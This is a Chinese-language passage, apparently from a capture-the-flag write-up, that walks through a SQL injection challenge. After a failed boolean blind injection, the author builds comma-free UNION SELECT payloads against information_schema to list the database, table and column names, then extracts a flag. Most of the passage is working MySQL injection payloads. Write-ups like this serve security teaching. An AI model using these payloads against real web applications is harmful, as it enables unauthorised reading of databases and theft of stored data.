接着爆数据库,发现无法得到,没办法,只能手工注入了, 这里我选择基于布尔的盲注,因为这样的回显比基于时间的看起来明显。 输入参数 1' and ascii(substr((select database()),1,1))>64 %23 查询数据库名,发现,注入失败,并且,后面的sql语句被过滤掉了,id字段输出的应该就是过滤后的sql语句了
从网上看到一篇讲不需要逗号的mysql注入文章,http://wonderkun.cc/index.html/?p=442 于是重新构造payload,如id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23 可以看到数据库名称为sqli
紧接着,构造payload,获取表名 -1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23
构造payload,获取字段名 -1' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select version() ) b %23
构造payload,获取字段值,得到flag{34303304-de0b-4bad-a0df-84eb8a420df8} -1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23